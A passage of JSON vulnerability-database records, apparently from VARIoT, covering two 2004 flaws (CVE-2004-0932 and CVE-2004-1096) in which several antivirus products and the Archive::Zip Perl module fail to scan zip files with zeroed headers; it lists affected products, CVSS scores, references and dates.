},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0297",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "small business suite",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "4.6"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.3,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9.2"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "archive zip",
"scope": "eq",
"trust": 1.0,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.4.1.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.2"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.3"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.4.5"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.5"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.0"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "6.0"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.3"
},
{
"model": "anti-virus d",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "linux personal",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.2"
},
{
"model": "antivirus rav antivirus for mail servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.4.2"
},
{
"model": "antivirus rav antivirus for file servers",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "1.0"
},
{
"model": "antivirus rav antivirus desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "rav",
"version": "8.6"
},
{
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "10.1"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "5.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "4.0"
},
{
"model": "labs antivirus scanning engine",
"scope": "eq",
"trust": 0.3,
"vendor": "kaspersky",
"version": "3.0"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.013"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.012"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "eset",
"version": "1.011"
},
{
"model": "associates inoculateit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.5"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.4.1.13"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.3"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.2"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus for the gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "archive::zip",
"scope": "eq",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.13"
},
{
"model": "archive::zip",
"scope": "ne",
"trust": 0.3,
"vendor": "archive zip",
"version": "1.14"
}
],
"sources": [
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE Security Advisory\u203b labs@idefense.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0932",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-0932",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9362",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-0932",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-286",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9362",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee Anti-Virus Engine DATS drivers before 4398 released on Oct 13th 2004 and DATS Driver before 4397 October 6th 2004 allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Multiple Vendor Antivirus applications are reported vulnerable to a zip file detection evasion vulnerability. This vulnerability may allow maliciously crafted zip files to avoid being scanned and detected. \nA remote attacker can craft a malicious zip archive and send it a vulnerable user. The malicious archive can bypass the protection provided by a vulnerable antivirus program, giving users a false sense of security. If the user opens and executes the file, this attack can result in a malicious code infection. \nThis issue is reported to affected products offered by McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV. \nLatest antivirus products by Symantec, Bitdefender, Trend Micro and Panda are not vulnerable to this issue. McAfee Anti-Virus is an antivirus software",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0932"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "VULHUB",
"id": "VHN-9362"
}
],
"trust": 1.26
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9362",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "11448",
"trust": 2.0
},
{
"db": "NVD",
"id": "CVE-2004-0932",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "35055",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9362",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"id": "VAR-200501-0297",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
}
],
"trust": 0.725
},
"last_update_date": "2025-04-03T22:21:48.725000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "McAfee AntiVirus zip Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146864"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.3,
"url": "http://download.mcafee.com/uk/updates/updates.asp"
},
{
"trust": 0.3,
"url": "http://www.nod32.com/"
},
{
"trust": 0.3,
"url": "http://www.kaspersky.com/"
},
{
"trust": 0.3,
"url": "http://www.ravantivirus.com/"
},
{
"trust": 0.3,
"url": "http://www.sophos.com/"
},
{
"trust": 0.3,
"url": "http://supportconnectw.ca.com/public/ca_common_docs/arclib_vuln.asp"
},
{
"trust": 0.3,
"url": "/archive/1/378660"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-9362"
},
{
"db": "BID",
"id": "11448"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-01-27T00:00:00",
"db": "VULHUB",
"id": "VHN-9362"
},
{
"date": "2004-10-18T00:00:00",
"db": "BID",
"id": "11448"
},
{
"date": "2004-10-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"date": "2005-01-27T05:00:00",
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9362"
},
{
"date": "2009-07-12T08:06:00",
"db": "BID",
"id": "11448"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-286"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-0932"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee AntiVirus zip Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-286"
}
],
"trust": 0.6
}
}
VAR-200501-0243
Vulnerability from variot - Updated: 2025-04-03 22:21Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Archive::Zip does not properly parse Zip files and may incorrectly interpret malformed zip archives to contain zero length/size files. As a a result, anti-virus software using Archive::Zip may fail to detect malicious content within a Zip archive. Archive::Zip is a free perl module for working with zip compressed files. Archive::Zip versions prior to 1.14 have security bypass vulnerabilities when used in antivirus programs
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200501-0243",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "suse",
"version": "9.2"
},
{
"model": "antivirus engine",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "4.3.20"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.12"
},
{
"model": "inoculateit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.4.1.13"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.86"
},
{
"model": "small business suite",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "3.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.6"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.0_sp2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.78d"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.81"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "4.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "*"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.85"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.13"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.80"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.3"
},
{
"model": "for file servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "kaspersky lab",
"version": "5.0"
},
{
"model": "desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.6"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "nod32 antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "eset",
"version": "1.0.11"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.82"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "gentoo",
"version": "1.4"
},
{
"model": "for mail servers",
"scope": "eq",
"trust": 1.0,
"vendor": "rav antivirus",
"version": "8.4.2"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.83"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "mandrake linux",
"scope": "eq",
"trust": 1.0,
"vendor": "mandrakesoft",
"version": "10.1"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.84"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.79"
},
{
"model": "puremessage anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "4.6"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cpan",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"cve": "CVE-2004-1096",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
